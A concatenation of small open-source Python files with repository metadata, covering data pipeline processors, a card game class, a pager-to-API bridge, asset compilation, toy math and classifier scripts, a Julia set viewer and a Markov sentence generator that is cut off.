def drop_empty_properties(field):
"""Remove empty properties, as they cause the validation to fail.
"""
return {
key: value
for key, value
in field.items()
if value
}
def fix_date(raw_date):
"""Return an ISO-8601 date or None if parsing is impossible.
"""
try:
return arrow.get(raw_date).format('YYYY-MM-DD')
except ParserError:
logging.warning('Could not parse date = %s', raw_date)
def fix_resource(first_resource, resource):
"""Use the first resource to fill in other resources.
"""
for property_ in first_resource.keys():
if not resource.get(property_):
resource[property_] = first_resource[property_]
return resource
def convert_to_name(title):
"""Return the name property given the title.
"""
return slugify(title, separator='-').lower()
def fix_fields(fields):
"""Return a valid and clean version of the field property.
"""
for i, field in enumerate(fields):
new_field = drop_empty_properties(field)
new_field['name'] = new_field['name'].strip()
new_field['type'] = 'string'
fields[i] = new_field
return fields
def create_datapackage(datapackage={}):
"""Convert a source description to a standard datapackage."""
datapackage = drop_empty_properties(datapackage)
first_resource = datapackage['resources'][0]
for resource in datapackage['resources']:
resource = fix_resource(first_resource, resource)
resource['name'] = convert_to_name(resource['title'])
resource['schema']['fields'] = fix_fields(resource['schema']['fields'])
resource[PROP_STREAMING] = True
if 'publication_date' in resource:
raw_date = resource['publication_date']
resource['publication_date'] = fix_date(raw_date)
datapackage_dump = json.dumps(datapackage, **JSON_FORMAT)
logging.debug('Datapackage: \n%s', datapackage_dump)
return datapackage
if __name__ == '__main__':
parameters, _, _ = ingest()
datapackage_ = create_datapackage(**parameters)
spew(datapackage_, [[] for _ in datapackage_['resources']])
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/read_description.py",
"copies": "1",
"size": "2788",
"license": "mit",
"hash": -817485862679533700,
"line_mean": 29.3043478261,
"line_max": 79,
"alpha_frac": 0.6631994261,
"autogenerated": false,
"ratio": 3.988555078683834,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 92
} |
"""A processor to inject categories values into the data."""
from datapackage_pipelines.wrapper import ingest, spew
from common.row_processor import process
def inject_categories(row, **category_tables):
"""Inject categories values into the data.
Constants are taken from the following places (in order of override):
* The processor's pipeline parameters
* The datapackage's `constant_fields_injector` property
* Each resource's `constant_fields_injector` property
If no constants are found, the processor does nothing.
:param row: one row of data as `dict`
:param category_tables: a `dict` of lookup tables
:returns row: the new row
"""
report = '_pass'
for category, table in category_tables.items():
try:
row[category] = table[row[category]]
except KeyError:
report = row[category]
return row, report
if __name__ == '__main__':
"""Ingest, process and spew out."""
parameters_, datapackage_, resources_ = ingest()
new_resources_, _ = process(resources_,
inject_categories,
datapackage=datapackage_,
parameters=parameters_)
spew(datapackage_, new_resources_)
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/add_categories.py",
"copies": "1",
"size": "1290",
"license": "mit",
"hash": -2969534193247457300,
"line_mean": 29,
"line_max": 73,
"alpha_frac": 0.6224806202,
"autogenerated": false,
"ratio": 4.607142857142857,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5729623477342857,
"avg_score": null,
"num_lines": null
} |
"""A processor to inject constant values into the data."""
from datapackage_pipelines.wrapper import ingest, spew
from common.row_processor import process
def inject_constants(row, **constants):
"""Inject constant values into the data.
Constants are taken from the following places (in order of override):
* The processor's pipeline parameters
* The datapackage's `constant_fields_injector` property
* Each resource's `constant_fields_injector` property
If no constants are found, the processor does nothing.
:param row: one row of data as `dict`
:param constants: a `dict` of constants
:returns row: the new row
"""
stats = '_pass'
for key, value in constants.items():
if value is not None:
row[key] = value
return row, stats
if __name__ == '__main__':
"""Ingest, process and spew out."""
parameters_, datapackage_, resources_ = ingest()
new_resources_, _ = process(resources_,
inject_constants,
datapackage=datapackage_,
parameters=parameters_)
spew(datapackage_, new_resources_)
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/add_constants.py",
"copies": "1",
"size": "1193",
"license": "mit",
"hash": -813487515100932700,
"line_mean": 27.4047619048,
"line_max": 73,
"alpha_frac": 0.6186085499,
"autogenerated": false,
"ratio": 4.5534351145038165,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5672043664403817,
"avg_score": null,
"num_lines": null
} |
"""A processor to map values."""
from logging import warning
from common.utilities import process
from datapackage_pipelines.wrapper import ingest, spew
def map_aliases(row, lookup_tables):
"""Map aliases using the lookup tables provided in the specs."""
for key, lookup in lookup_tables.items():
if row[key] in lookup:
row[key] = lookup[row[key]]
else:
warning('%s mapped to None because no alias was found', row[key])
row[key] = None
return row
def build_lookup_tables(mappings):
"""Build the lookup tables."""
def lookup_table(mapping):
for key, aliases in mapping.items():
for alias in aliases:
yield alias, key
return {
mapping['field']:
dict(lookup_table(mapping['mapping']))
for mapping in mappings
}
if __name__ == '__main__':
parameters, _, resources = ingest()
lookup_tables_ = build_lookup_tables(parameters['mappings'])
new_resources = process(resources, map_aliases,
lookup_tables=lookup_tables_)
spew(_, new_resources)
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/map_values.py",
"copies": "1",
"size": "1135",
"license": "mit",
"hash": 4418022603545033700,
"line_mean": 27.375,
"line_max": 77,
"alpha_frac": 0.6070484581,
"autogenerated": false,
"ratio": 4.299242424242424,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5406290882342424,
"avg_score": null,
"num_lines": null
} |
"""A processor to stream data from files."""
import os
import json
import cchardet as chardet
from tabulator import Stream
from logging import warning, info
from datapackage_pipelines.wrapper import ingest, spew
from petl import look, fromdicts
from common.config import LOG_SAMPLE_SIZE
from common.utilities import format_to_json, sanitize_field_names
def get_json_headers(path):
"""Return all field names encountered in the file."""
keys = set()
with open(path) as stream:
rows = json.loads(stream.read())
for row in rows:
keys.update(set(row))
return list(keys)
def get_encoding(parameters, resource):
"""Return either the specified encoding or a best guess."""
with open(resource['path'], 'rb') as stream:
text = stream.read()
encoding = chardet.detect(text)['encoding']
if parameters.get('encoding'):
encoding = parameters.get('encoding')
if resource.get('encoding'):
encoding = resource.get('encoding')
return encoding
def get_skip_rows(row_to_skip):
"""Return a post-parse processor to skip arbitrary rows."""
def skip_rows(rows):
for index, headers, row in rows:
if index not in row_to_skip:
yield (index, headers, row)
else:
row_as_json = format_to_json(dict(zip(headers, row)))
warning('Skipping row %s = %s', index, row_as_json)
return skip_rows
def drop_bad_rows(rows):
"""Drop rows where fields don't match headers."""
for index, headers, row in rows:
if len(row) == len(headers):
yield (index, headers, row)
else:
warning('Bad row %s = %s', index, row)
def force_strings(rows):
"""Force all fields to strings."""
for index, headers, values in rows:
values_as_strings = list(map(str, values))
yield (index, headers, values_as_strings)
def fill_missing_fields(path):
"""Pre-fill incomplete JSON rows (to avoid fields mixing up)."""
headers = get_json_headers(path)
with open(path) as stream:
rows = json.loads(stream.read())
for row in rows:
for header in headers:
if header not in row:
row[header] = None
with open(path, 'w+') as stream:
stream.write(format_to_json(rows))
def log_sample_table(stream):
"""Record a tabular representation of the stream sample to the log."""
samples = list(map(lambda x: dict(zip(stream.headers, x)), stream.sample))
table = look(fromdicts(samples), limit=len(stream.sample))
info('Data sample =\n%s', table)
def check_fields_match(resource, stream):
"""Check if the datapackage and the data have the same set of fields."""
data_fields = [str(field) for field in stream.headers if field]
sourced_fields = [field['name'] for field in resource['schema']['fields']]
nb_untitled_fields = len(stream.headers) - len(data_fields)
fields_as_json = format_to_json(sorted(sourced_fields))
data_fields_as_json = format_to_json(sorted(data_fields))
info('%s fields sourced = %s', len(sourced_fields), fields_as_json)
info('%s untitled fields in the data', nb_untitled_fields)
info('%s fields in the data = %s', len(data_fields), data_fields_as_json)
message = 'Data and source fields do not match'
assert set(data_fields) == set(sourced_fields), message
def get_headers(parameters, path):
"""Return a list of cleaned up headers."""
with Stream(path, **parameters) as stream:
return sanitize_field_names(stream.headers)
def stream_local_file(datapackage, **parameters):
"""Read local files and return row iterators."""
if not parameters.get('sample_size'):
parameters.update(sample_size=LOG_SAMPLE_SIZE)
for resource in datapackage['resources']:
path = resource['path']
_, extension = os.path.splitext(path)
parameters.update(headers=1)
parameters['post_parse'] = []
if 'parser_options' in resource:
if resource['parser_options'].get('skip_rows'):
row_numbers = resource['parser_options'].pop('skip_rows') or []
if row_numbers:
parameters['post_parse'] = [get_skip_rows(row_numbers)]
parameters.update(**resource.get('parser_options'))
if extension == '.csv':
parameters['post_parse'].append(drop_bad_rows)
parameters.update(encoding=get_encoding(parameters, resource))
if extension in ('.xls', '.xlsx'):
parameters['post_parse'].append(force_strings)
if extension == '.json':
fill_missing_fields(path)
parameters['post_parse'].append(force_strings)
info('Ingesting file = %s', path)
info('Ingestion parameters = %s', format_to_json(parameters))
parameters.update(headers=get_headers(parameters, path))
with Stream(path, **parameters) as stream:
check_fields_match(resource, stream)
log_sample_table(stream)
yield stream.iter(keyed=True)
if __name__ == '__main__':
parameters_, datapackage_, _ = ingest()
parameters_ = {} if parameters_ is None else parameters_
resources = stream_local_file(datapackage_, **parameters_)
spew(datapackage_, resources)
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/stream_from_path.py",
"copies": "1",
"size": "5351",
"license": "mit",
"hash": 8960390727331111000,
"line_mean": 30.6627218935,
"line_max": 79,
"alpha_frac": 0.6314707531,
"autogenerated": false,
"ratio": 3.9029905178701676,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 169
} |
"""A program card."""
from csrv.model import actions
from csrv.model import events
from csrv.model.cards import card_base
from csrv.model import game_object
from csrv.model import modifiers
from csrv.model import parameters
from csrv.model import timing_phases
from csrv.model.cards import card_info
class Program(card_base.CardBase):
TYPE = card_info.PROGRAM
REZZABLE = False
WHEN_INSTALLED_LISTENS = [
events.PurgeVirusCounters,
]
WHEN_IN_HAND_PROVIDES_CHOICES_FOR = {
timing_phases.RunnerTurnActions: 'install_actions',
}
HOST_ON = []
@property
@modifiers.modifiable(modifiers.ProgramStrengthModifier, server_scope=False)
def strength(self):
return self.STRENGTH
@property
@modifiers.modifiable(modifiers.ProgramCostModifier, server_scope=False)
def cost(self):
return self.COST
def build_actions(self):
self.install_action = actions.InstallProgram(self.game, self.player, self)
def install_actions(self):
return [self.install_action]
def install_host_targets(self):
targets = []
for card in self.game.runner.rig.cards:
if card.can_host(self):
targets.append(card)
return targets
def install_programs_to_trash_targets(self):
return [c for c in self.game.runner.rig.cards if isinstance(c, Program)]
def on_purge_virus_counters(self, sender, event):
self.virus_counters = 0
def on_install(self):
card_base.CardBase.on_install(self)
self.trigger_event(events.InstallProgram(self.game, self.player))
self.game.register_response_target(
parameters.InstallProgramRequest, 'programs_to_trash', self)
def on_uninstall(self):
card_base.CardBase.on_uninstall(self)
self.game.deregister_response_target(
parameters.InstallProgramRequest, 'programs_to_trash', self)
| {
"repo_name": "mrroach/CentralServer",
"path": "csrv/model/cards/program.py",
"copies": "1",
"size": "1810",
"license": "apache-2.0",
"hash": 7477273404108826000,
"line_mean": 26.8461538462,
"line_max": 78,
"alpha_frac": 0.7287292818,
"autogenerated": false,
"ratio": 3.5009671179883948,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4729696399788395,
"avg_score": null,
"num_lines": null
} |
# A program made by Shane (Shaggs) Rees to use PDW's email function into python.
""" To get Started
Options -> SMTP / email settings
Setting set to all messages
SMTP Host 127.0.0.1
Port 8826
To can be set as anything
From can be set as anything
Mail options select
Address, Time, Date, Bitrate, Message
Notification set to messages
"""
import asyncore
from datetime import datetime
import email
from clint.textui import puts, colored
import time
import smtpd
import requests
frag = " "
def apost(flexcode, msg, when):
headers = {
'X-Requested-With': 'XMLHttpRequest',
'apikey': "", #pagermon APIKey
'User-Agent': 'PagerMon pdw2pagermon.py',
}
params = {
"address": flexcode,
"message": msg,
"datetime": when,
"source": "",
}
requests.post('http://Your IP Address Here/api/messages', data=params, headers=headers)
class CustomSMTPServer(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
mime_message = email.message_from_bytes(data)
message = mime_message.get_payload()
flexcode, a, b, bitrate, msg = message.split(' ',4)
when = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
flexcode = "00"+flexcode
msg = msg.strip()
bitrate = str(bitrate)
if bitrate == "1600":
self.frag = msg
puts(colored.yellow(flexcode), newline=False)
puts(" [", newline=False)
puts(colored.green(when), newline=False)
puts("] ", newline=False)
puts(msg)
apost(flexcode, msg, when)
elif bitrate == "1601":
msg = self.frag + msg
puts(colored.yellow(flexcode), newline=False)
puts(" [", newline=False)
puts(colored.green(when), newline=False)
puts("] ", newline=False)
puts(msg)
apost(flexcode, msg, when)
return
server = CustomSMTPServer(('127.0.0.1', 8826), None)
asyncore.loop()
| {
"repo_name": "davidmckenzie/pagermon",
"path": "client/pdw2pagermon.py",
"copies": "1",
"size": "1798",
"license": "unlicense",
"hash": -7543912581026589000,
"line_mean": 26.2424242424,
"line_max": 89,
"alpha_frac": 0.680756396,
"autogenerated": false,
"ratio": 2.966996699669967,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8978296764213853,
"avg_score": 0.03389126629122267,
"num_lines": 66
} |
"""A programmatic compiler of static assets."""
from __future__ import unicode_literals
import abc
from django.utils import six
from optimizations.assetcache import StaticAsset
class AssetCompilerPluginRegistrationError(Exception):
"""An error occured while registering asset compiler plugins."""
class AssetCompilerPluginBase(six.with_metaclass(abc.ABCMeta)):
"""Base class for asset compiler plugins."""
asset_type = "various"
@abc.abstractmethod
def compile_assets(self, assets):
"""Compiles the given assets."""
raise NotImplementedError
class AssetCompiler(object):
"""A programmatic compiler of static assets."""
def __init__(self):
"""Initializes the asset compiler."""
self._plugins = {}
# Registration.
def register_plugin(self, name, plugin):
"""Registers the given plugin with the asset compiler."""
if name in self._plugins:
raise AssetCompilerPluginRegistrationError("{name} is already registered with this asset compiler.".format(name=name))
if not isinstance(plugin, AssetCompilerPluginBase):
raise AssetCompilerPluginRegistrationError("{plugin} is not an instance of AssetCompilerPluginBase.".format(plugin=plugin))
self._plugins[name] = plugin
def unregister_plugin(self, name):
"""Unregisters the given plugin."""
try:
del self._plugins[name]
except KeyError:
raise AssetCompilerPluginRegistrationError("{name} is already registered with this asset compiler.".format(name=name))
def has_plugin(self, name):
"""Tests whether the given plugin is registered with this asset compiler."""
return name in self._plugins
# Compilation.
def compile_iter(self, namespace="default"):
"""Iterates over all assets in the given namespace, compiling as it goes."""
for plugin_name, plugin in six.iteritems(self._plugins):
assets = StaticAsset.load(plugin_name, namespace)
plugin.compile_assets(assets)
yield plugin, assets
def compile(self, namespace="default"):
"""Compiles all assets in the given namespace."""
return list(self.compile_iter(namespace))
# A shared, global asset compiler.
default_asset_compiler = AssetCompiler() | {
"repo_name": "etianen/django-optimizations",
"path": "src/optimizations/assetcompiler.py",
"copies": "1",
"size": "2397",
"license": "bsd-3-clause",
"hash": -2061890371834176500,
"line_mean": 32.3055555556,
"line_max": 135,
"alpha_frac": 0.6637463496,
"autogenerated": false,
"ratio": 4.891836734693878,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6055583084293877,
"avg_score": null,
"num_lines": null
} |
# A program that computes the the area in feet of three (3) rooms
# their must be four function to compute the area
# Written by Adrian Anderson Programmer, 11/27/17
store = []
def feet_to_yards(yard):
answer = yard * 1/3
return answer
def area_of_room(length, width, height):
return 2 * height * (length + width)
def cost_per_feet(num_of_feet):
return num_of_feet * 8.95
def main():
room = 0
for i in range(3):
room += 1
length = int(input('What is the length of the room ' + str(room) + ' ' ))
print('')
width = int(input('What is the width of the room ' + str(room) + ' '))
print('')
height = int(input('What is the height of the room ' + str(room) + ' '))
print('')
area = area_of_room(height, width, length)
yard = feet_to_yards(area)
cost = cost_per_feet(yard)
store.append(cost)
total_cost = sum(store)
print('The total cost of the three room combine is', f'{total_cost:.2f}')
main()
| {
"repo_name": "biggapoww/Python-CIS-5",
"path": "computing_carpet.py",
"copies": "1",
"size": "1032",
"license": "mit",
"hash": -8258527748024722000,
"line_mean": 24.1707317073,
"line_max": 81,
"alpha_frac": 0.5843023256,
"autogenerated": false,
"ratio": 3.2555205047318614,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9171250698811089,
"avg_score": 0.03371442630415464,
"num_lines": 41
} |
# A program that has a list of six colors and chooses one by random. The user can then has three chances to quess the right color. After the third attepmt the program outputs "Nope. The color I was thinking of was..."
import random
# this is the function that will execute the program
def program():
# These are the constants declaring what the colors are.
RED = 'red'
BLUE = 'blue'
GREEN = 'green'
ORANGE = 'orange'
PURPLE = 'purple'
PINK = 'pink'
class Color:
pass
c1 = Color()
c2 = Color()
c3 = Color()
guesses_made = 0
# This input causes the program to refer to you as your name.
c1.name = input('Hello! What is your name?\n')
c2.color = [BLUE, GREEN, RED, ORANGE, PURPLE, PINK]
# This randomizes what color is chosen
c2.color = random.choice(c2.color)
print ('Well, {0}, I am thinking of a color between blue, green, red, orange, purple and pink.'.format(c1.name))
while guesses_made < 3:
c3.guess = input('Take a guess: ')
guesses_made += 1
if c3.guess != c2.color:
print ('Your guess is wrong.')
if c3.guess == c2.color:
break
if c3.guess == c2.color:
print ('Good job, {0}! You guessed my color in {1} guesses!'.format(c1.name, guesses_made))
else:
print ('Nope. The color I was thinking of was {0}'.format(c2.color))
if __name__ == "__main__":
program()
| {
"repo_name": "starnes/Python",
"path": "guessnameclass.py",
"copies": "1",
"size": "1452",
"license": "mit",
"hash": 844623943014182800,
"line_mean": 29.25,
"line_max": 217,
"alpha_frac": 0.6095041322,
"autogenerated": false,
"ratio": 3.4004683840749412,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4509972516274941,
"avg_score": null,
"num_lines": null
} |
"""A program that implements classifying data by primitive algorythms."""
from classifier import Classifier
from onerule import OneRuleClassifier
# The constant that defines the count of
# data to be passed while training classifier
MAX_SELECTOR = 2
def main():
"""Main program method."""
data = read_from_file(name='iris.data')
training_data = []
selector = 0
for item in data:
if selector >= MAX_SELECTOR:
training_data.append(item)
selector = 0
else:
selector += 1
print("Plain classifier: ")
classifier = Classifier(training_data)
classifier.classify(data)
print
print("1R classifier: ")
classifier = OneRuleClassifier(training_data)
classifier.classify(data)
def read_from_file(name=""):
"""Read a csv file."""
data = []
import csv
with open(name, "r") as data_file:
datareader = csv.reader(data_file, delimiter=',', quotechar=' ')
for row in datareader:
point = {"vals": []}
for value in row:
try:
point["vals"].append(float(value))
except ValueError:
point["class"] = value
if len(point["vals"]) == 4 and "class" in point:
data.append(point)
return data
if __name__ == "__main__":
main()
| {
"repo_name": "cleac/univ-datamine",
"path": "lab1/main.py",
"copies": "1",
"size": "1367",
"license": "mit",
"hash": -1097262508513632100,
"line_mean": 26.34,
"line_max": 73,
"alpha_frac": 0.5786393563,
"autogenerated": false,
"ratio": 4.219135802469136,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5297775158769136,
"avg_score": null,
"num_lines": null
} |
"""A program that implements classifying data by primitive algorythms."""
from classifier import Classifier
# The constant that defines the count of
# data to be passed while training classifier
MAX_SELECTOR = 2
def main():
"""Main program method."""
data = read_from_file(name='iris.data')
training_data = []
selector = 0
for item in data:
if selector >= MAX_SELECTOR:
training_data.append(item)
selector = 0
else:
selector += 1
print("Divide'n'Conquer classifier: ")
classifier = Classifier(training_data)
classifier.classify(data)
def read_from_file(name=""):
"""Read a csv file."""
data = []
import csv
with open(name, "r") as data_file:
datareader = csv.reader(data_file, delimiter=',', quotechar=' ')
for row in datareader:
point = {"vals": []}
for value in row:
try:
point["vals"].append(float(value))
except ValueError:
point["class"] = value
if len(point["vals"]) == 4 and "class" in point:
data.append(point)
return data
if __name__ == "__main__":
main()
| {
"repo_name": "cleac/univ-datamine",
"path": "lab2/main.py",
"copies": "1",
"size": "1221",
"license": "mit",
"hash": -5373161933638116000,
"line_mean": 26.1333333333,
"line_max": 73,
"alpha_frac": 0.5593775594,
"autogenerated": false,
"ratio": 4.181506849315069,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5240884408715069,
"avg_score": null,
"num_lines": null
} |
""" A program that stores and updates a counter using a Python pickle file"""
from os.path import exists
import sys
from pickle import dump, load
def update_counter(file_name, reset=False):
""" Updates a counter stored in the file 'file_name'
A new counter will be created and initialized to 1 if none exists or if
the reset flag is True.
If the counter already exists and reset is False, the counter's value will
be incremented.
file_name: the file that stores the counter to be incremented. If the file
doesn't exist, a counter is created and initialized to 1.
reset: True if the counter in the file should be rest.
returns: the new counter value
>>> update_counter('blah.txt',True)
1
>>> update_counter('blah.txt')
2
>>> update_counter('blah2.txt',True)
1
>>> update_counter('blah.txt')
3
>>> update_counter('blah2.txt')
2
"""
if exists(file_name):
f = open(file_name, 'r+')
if reset:
counter = 1
dump(counter, f)
else:
counter = load(f)
counter += 1
f.seek(0,0)
dump(counter, f)
else:
f = open(file_name, 'w')
counter = 1
dump(counter, f)
f.close()
return counter
if __name__ == '__main__':
if len(sys.argv) < 2:
import doctest
doctest.testmod()
else:
print "new value is " + str(update_counter(sys.argv[1])) | {
"repo_name": "nshlapo/SoftwareDesignFall15",
"path": "toolbox/pickling/counter.py",
"copies": "1",
"size": "1300",
"license": "mit",
"hash": 8534215024426564000,
"line_mean": 21.0508474576,
"line_max": 77,
"alpha_frac": 0.6684615385,
"autogenerated": false,
"ratio": 3.0878859857482186,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8935356029647594,
"avg_score": 0.0641982989201247,
"num_lines": 59
} |
#A program that takes two given numbers and returns their LCM
# -Shriram Krishnamachari 7/19/16
from collections import Counter as mset
def smallestFactor(n):
for i in range(2, n+1):
if n % i == 0:
return i
def factorize(number):
factor = list()
if number == 1:
factor.append(1)
cn = number
while cn > 1:
sf = smallestFactor(cn)
factor.append(sf)
cn = cn / sf
return factor
def gcd(number1, number2):
factor1 = factorize(number1)
factor2 = factorize(number2)
commonfactors = list((mset(factor1) & mset(factor2)).elements())
gcd = 1
# the following loop takes each element in common factors
# and makes gcd = gcd * e
# the short form of which is gcd *= e
for e in commonfactors:
gcd *= e
return gcd
def lcm(number1, number2):
lcm = number1*number2/gcd(number1, number2)
return lcm
number1 = input('Give a number')
number2 = input('Give another number')
print 'The Least common multiple is ' + str(lcm(number1, number2)) | {
"repo_name": "TheArcMagician/Number-theory",
"path": "leastcommonmultiple.py",
"copies": "1",
"size": "1119",
"license": "mit",
"hash": -312735640968435000,
"line_mean": 20.1320754717,
"line_max": 69,
"alpha_frac": 0.5987488829,
"autogenerated": false,
"ratio": 3.4643962848297214,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.45631451677297213,
"avg_score": null,
"num_lines": null
} |
# a program to calculate fractals
import itertools
import numpy
import pyglet
import pyglet.graphics
import julia
class Point(object):
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return "(%d, %d)" % (self.x, self.y)
def clear(self):
self.x = None
self.y = None
def valid(self):
if self.x and self.y:
return True
else:
return False
class World(object):
def __init__(self, julia_set, others, colors):
self.julia_set = julia_set
self.other_points = others
self.colors = colors
def set_attributes(self, x_origin, y_origin, width, size):
self.x_origin = x_origin
self.y_origin = y_origin
self.width = width
self.size = size
def number_in_julia_set(z, c):
z_n = z
for i in xrange(100):
z_n = z_n**2 + c
if abs(z_n) > 2:
return i
return True
def reverse_transform(x, y, x_origin, y_origin, width, screen_size):
x = float(width) * x / screen_size + x_origin
y = float(width) * y / screen_size + y_origin
return [x, y]
def transform_coordinates(x, y, x_origin, y_origin, width, screen_size):
x = (x - x_origin) / float(width) * screen_size
y = (y - y_origin) / float(width) * screen_size
return [x, y]
def get_julia_set(c, x_origin, y_origin, width, size):
""" c - the c paramter in z = z^2 + c
x, y - the coordinate of the lower left corner
width - the width in coordinates of the space
size - number of pixels wide"""
x_space = numpy.linspace(x_origin, x_origin+width, size)
y_space = numpy.linspace(y_origin, y_origin+width, size)
colors = []
other_points = []
julia_set = []
i = 0
counter = 0
for x, y in itertools.product(x_space, y_space):
transformed = transform_coordinates(x, y, x_origin, y_origin, width, size)
z = complex(x, y)
result = julia.number_in_julia_set(z, c)
if result == True:
julia_set.extend(transformed)
else:
other_points.extend(transformed)
#red = int(-0.0255*result**2 + 5.1*result)
red = int(result / 100. * 255)
blue = 255 - red
colors.extend([red, 0, blue, 255])
i += 1
if i % int(size**2 * 0.05) == 0:
print "%.1f%%" % (i / float(size**2) * 100)
return julia_set, other_points, colors
size = 700
window = pyglet.window.Window(size, size)
c = -0.757 + -0.164j
c2 = -0.116 + 0.895j
c3 = -0.01 + 0.651j
c4 = -0.15 + 1.0j
c5 = -0.52 + 0.57j
c = c5
x_origin = 0.0
y_origin = 0.0
width = 0.5
julia_set, other_points, colors = get_julia_set(c, x_origin, y_origin, width, size)
world = World(julia_set, other_points, colors)
world.set_attributes(x_origin, y_origin, width, size)
click_point = Point(None, None)
drag_point = Point(None, None)
@window.event
def on_draw():
window.clear()
#pyglet.graphics.draw(len(julia_set) / 2, pyglet.gl.GL_POINTS,
# ('v2f', julia_set)
#)
# Here just leave it the black of the background, so the actual set appears black
pyglet.graphics.draw(len(world.other_points) / 2, pyglet.gl.GL_POINTS,
('v2f', world.other_points),
('c4B', world.colors)
)
if click_point.valid() and drag_point.valid():
width1 = drag_point.x - click_point.x
width2 = drag_point.y - click_point.y
if abs(width1) > abs(width2):
width = width1
else:
width = width2
point1 = [click_point.x, click_point.y]
point2 = [click_point.x+width, click_point.y]
point3 = [click_point.x+width, click_point.y+width]
point4 = [click_point.x, click_point.y+width]
pyglet.graphics.draw(4, pyglet.gl.GL_LINE_LOOP,
('v2i', (point1 + point2 + point3 + point4)),
('c4B', (255, 255, 255, 255) * 4)
)
@window.event
def on_mouse_motion(x, y, dx, dy):
real, imaginary = reverse_transform(x, y, world.x_origin, world.y_origin, world.width, world.size)
# if imaginary >= 0:
# print "%.3f + %.3fi" % (real, imaginary)
# else:
# print "%.3f - %.3fi" % (real, -imaginary)
@window.event
def on_mouse_press(x, y, button, modifiers):
click_point.x = x
click_point.y = y
@window.event
def on_mouse_drag(x, y, dx, dy, buttons, modifiers):
drag_point.x = x
drag_point.y = y
@window.event
def on_mouse_release(x, y, button, modifiers):
width1 = drag_point.x - click_point.x
width2 = drag_point.y - click_point.y
if abs(width1) > abs(width2):
box_width = width1
else:
box_width = width2
new_x_origin, new_y_origin = reverse_transform(click_point.x, click_point.y, world.x_origin, world.y_origin, world.width, world.size)
new_width = box_width * (world.width / world.size)
julia_set, other_points, colors = get_julia_set(c, new_x_origin, new_y_origin, new_width, world.size)
world.julia_set = julia_set
world.other_points = other_points
world.colors = colors
world.set_attributes(new_x_origin, new_y_origin, new_width, size)
print new_x_origin, new_y_origin
print new_width
click_point.clear()
drag_point.clear()
pyglet.app.run() | {
"repo_name": "asgordon96/Julia-Set",
"path": "fractals_new.py",
"copies": "1",
"size": "5368",
"license": "mit",
"hash": -3536276131188730400,
"line_mean": 28.8277777778,
"line_max": 137,
"alpha_frac": 0.5806631893,
"autogenerated": false,
"ratio": 3.003917179630666,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4084580368930666,
"avg_score": null,
"num_lines": null
} |
#A program to generate a series of random sentences from a text file using Markov chains
#by Grace Newman, written for CS 111 (Intro to CS), completed March 1, 2013
from random import randrange
class sentenceGenerator:
def __init__(self): #initialize an instance as empty list of start words and empty dictionary of word connections
self.startWords=[]
self.connections={}
def makeData(self, filename):
file=open(filename) #open the file and put all the words in a list
words=file.read().split()
file.close()
self.makeStarts(words) #make the list of start words and dictionary of connections using the functions
self.makeConnect(words)
def makeStarts(self, wordlist):
for word in wordlist:
if 65<=ord(word[0])<=90 and word not in self.startWords: #select all of the words that begin with an uppercase letter and aren't already in the list
self.startWords.append(word) #append those to the list of start words
def makeConnect(self, wordlist):
for x in range(len(wordlist)-1): #for each index in the list, get the word and the following word
word=wordlist[x]
entry=wordlist[x+1]
if self.connections.has_key(word): #if it's already in the dictionary, just append the next word to the entry list
self.connections[word].append(entry)
else:
self.connections[word]=[entry] #if it's not already there, just make it a list entry containing the entry
def randomSentence(self):
punctuation=[".", "!", "?"] #initialize a list of ending punctuation and a sentence list for later
sentence=[]
start=self.startWords[randrange(len(self.startWords))] #get a random position in startWords and use that to get the first word
index=randrange(len(self.connections[start])) #get a random word from the associated words with start
next=self.connections[start][index]
sentence.append(start) #put those puppies in the sentence
sentence.append(next)
while next[-1] not in punctuation and len(sentence)<=50 or len(sentence)<=4: #while the sentence is still going (doesn't end in punctuation, has less than four words, or has length of fifty words)
index=randrange(len(self.connections[next])) #get the next word as above and append it to the sentence
then=self.connections[next][index]
sentence.append(then)
next=then #set that word to initialize the next one
text=sentence[0] #now take that list of words and turn it into a string with appropriate spacing
for word in sentence[1:]:
text=text+" "+word
return text
def newCall(sentence): #for each new call, print a sentence and query the user
print sentence.randomSentence()
command=raw_input("Type 'g' for another sentence, 'n' to switch to a new file, and 'q' to quit: ")
return command
def main():
inFile=raw_input("Please input a .txt file to generate random sentences from: ") #to start off, get necessary info, make a sentence, and then ask for more info
sentence=sentenceGenerator()
currentInstance=sentence
data=sentence.makeData(inFile)
command=newCall(sentence)
while command!="q":
if command=="g":
command=newCall(currentInstance) #whenever the user asks for a new sentence, give it from the working instance
if command=="n":
inFile=raw_input("Please input a .txt file to generate random sentences from: ") #if they ask for a new file, make an instance and generate the data again, then query
sentencen=sentenceGenerator()
currentInstance=sentencen
data=sentencen.makeData(inFile)
command=newCall(sentencen)
main()
| {
"repo_name": "ganewman42/CodeSamples",
